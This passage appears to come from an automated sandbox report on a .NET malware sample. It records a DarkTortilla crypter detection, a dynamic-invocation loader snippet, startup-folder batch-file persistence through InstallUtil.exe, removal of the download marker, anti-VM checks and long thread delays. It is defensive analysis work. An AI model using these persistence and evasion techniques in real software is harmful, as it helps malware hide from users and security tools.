                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: file.exeStatic file information: File size 20133888 > 1048576
                    Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1333000
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Yara detected DarkTortilla Crypter
                    Source: Yara matchFile source: 1.2.file.exe.6910000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.file.exe.6910000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3516306034.0000000004E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3517750874.0000000006910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3515760632.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 932, type: MEMORYSTR
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: file.exe, Gj53F.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateIndexGet(NewLateBinding.LateGet(NewLateBinding.LateGet(array2[2], (Type)null, "GetTypes", new object[1] { 24 }, (string[])null, (Type[])null, (bool[])null), (Type)null, "GetMethods", new object[0], (string[])null, (Type[])null, (bool[])null), new object[1] { 0 }, (string[])null), (Type)null, "Invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212C178 push ecx; ret 1_2_0212C182
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212D21B push edx; ret 1_2_0212D22A
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212D20F push ebx; ret 1_2_0212D21A
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212D23B push ebx; ret 1_2_0212D21A
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212D22B push ebx; ret 1_2_0212D23A
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212D2D3 push ebp; ret 1_2_0212D2E2
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212D2C7 push ebp; ret 1_2_0212D2D2
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0212D13B push ecx; ret 1_2_0212D14A
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_023F8B45 push ebx; ret 1_2_023F8B46
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02408223 push edi; ret 1_2_0240841E
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240AACD push ds; retf 0040h1_2_0240AB1E
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240DBAA push esi; retf 1_2_0240DBAE
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240381C push 80C100E0h; retf 1_2_02403821
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0240842C push eax; ret 1_2_0240845D
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E789E9 push ecx; retf 0046h1_2_05E78A0A
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E7CD57 push eax; iretd 1_2_05E7CD66
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E7CD27 push ebp; retf 1_2_05E7CD39
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_05E7A320 pushad ; ret 1_2_05E7A333
                    Source: file.exe, y3B0.csHigh entropy of concatenated method names: 'i4G3Qy', 'a0G1Ns', 'Cn89Hm', 't9YXc3', 'g8BMd0', 'Zr8f6L', 'j8SNa7', 's3D0Hw', 'n9LYa1', 'p2E6Wy'
                    Source: file.exe, Gj53F.csHigh entropy of concatenated method names: 'Tc2', 'd3C', 'Jw2', 'f7Z', 'Ee9', 'Xi1', 'Jw6', 'Ma4', 'd2T', 'o5C'
                    Source: file.exe, y5W2J.csHigh entropy of concatenated method names: 'Gg', 'f0', 'c0', 'Ne', 'Ew', 'k8', 'Qr', 'y8', 'e1', 'i7'

                    Boot Survival

                    barindex
                    Drops script or batch files to the startup folder
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rp6RLsI5LmL2C04PREj94eun.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rp6RLsI5LmL2C04PREj94eun.batJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\file.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 932, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 2120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 3E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 5E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 9EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 8AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: CE70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: DE70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: F240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 11610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 12610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 12E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 13E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: F240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 11610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 15E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 12E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 9EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595368Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595260Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594030Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593813Jump to behavior
